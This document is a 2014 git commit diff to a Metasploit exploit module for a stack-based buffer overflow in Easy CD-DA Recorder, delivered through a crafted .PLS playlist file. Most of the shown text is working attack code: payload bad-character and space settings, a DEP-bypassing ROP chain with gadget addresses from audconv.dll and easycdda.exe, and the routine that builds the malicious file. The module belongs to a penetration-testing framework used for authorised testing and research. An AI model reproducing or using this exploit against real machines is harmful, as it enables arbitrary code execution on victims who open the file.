Fix and improve reliability

bug/bundler_fix
jvazquez-r7 2014-02-11 10:44:58 -06:00
parent e8a3984c85
commit 3717374896
1 changed files with 21 additions and 19 deletions

View File

@ -9,18 +9,17 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Easy CD-DA Recorder 2007 PLS Buffer Overflow',
'Name' => 'Easy CD-DA Recorder PLS Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability in
Easy CD-DA Recorder 2007, caused by a long string in a playlist entry.
By persuading the victim to open a specially-crafted .PLS file, a
remote attacker could execute arbitrary code on the system or cause
the application to crash.
the application to crash. This modules has been tested successfully on
Windows XP SP3 and Windows 7 SP1.
},
'License' => MSF_LICENSE,
'Author' =>
@ -43,17 +42,21 @@ class Metasploit3 < Msf::Exploit::Remote
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x0a\x3d",
'Space' => 2559
'DisableNops' => true,
'BadChars' => "\x0a\x3d",
'Space' => 2472,
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
},
'Targets' =>
[
[ 'Windows XP SP3 (DEP Bypass)',
[ 'Windows XP SP3 / Windows 7 SP1 (DEP Bypass)',
# easycdda.exe 3.0.114.0
# audconv.dll 7.0.815.0
{
'Offset' => 1108,
'Ret' => 0x1001b19b # ADD ESP,0C10 # RETN 0x04 [audconv.dll]
}
],
]
],
'Privileged' => false,
'DisclosureDate' => 'Jun 7 2010',
@ -71,12 +74,12 @@ class Metasploit3 < Msf::Exploit::Remote
return make_nops(4).unpack("V").first
end
def exploit
def rop_nops(n = 1)
# RETN (ROP NOP) [audconv.dll]
[0x1003d55d].pack('V') * n
end
rop_nop =
[
0x1003d55d # RETN (ROP NOP) [audconv.dll]
].flatten.pack('V*')
def exploit
# ROP chain generated by mona.py - See corelan.be
rop_gadgets =
@ -100,15 +103,14 @@ class Metasploit3 < Msf::Exploit::Remote
0x00429692 # PUSHAD # INC EBX # ADD CL,CH # RETN [easycdda.exe]
].flatten.pack('V*')
sploit = rand_text_alpha_upper(target['Offset'])
sploit << generate_seh_record(target.ret)
sploit << rand_text_alpha_upper(80)
sploit << rop_nop
sploit << rand_text_alpha_upper(4)
sploit = rop_nops(target['Offset'] / 4)
sploit << [0x1003d55c].pack("V") # pop edi # ret [audconv.dll]
sploit << [target.ret].pack("V")
sploit << rop_nops(22)
sploit << rop_gadgets
sploit << make_nops(4)
sploit << payload.encoded
sploit << rand_text_alpha_upper(10000)
sploit << rand_text_alpha_upper(10000) # make it crash
# Create the file
print_status("Creating '#{datastore['FILENAME']}' file ...")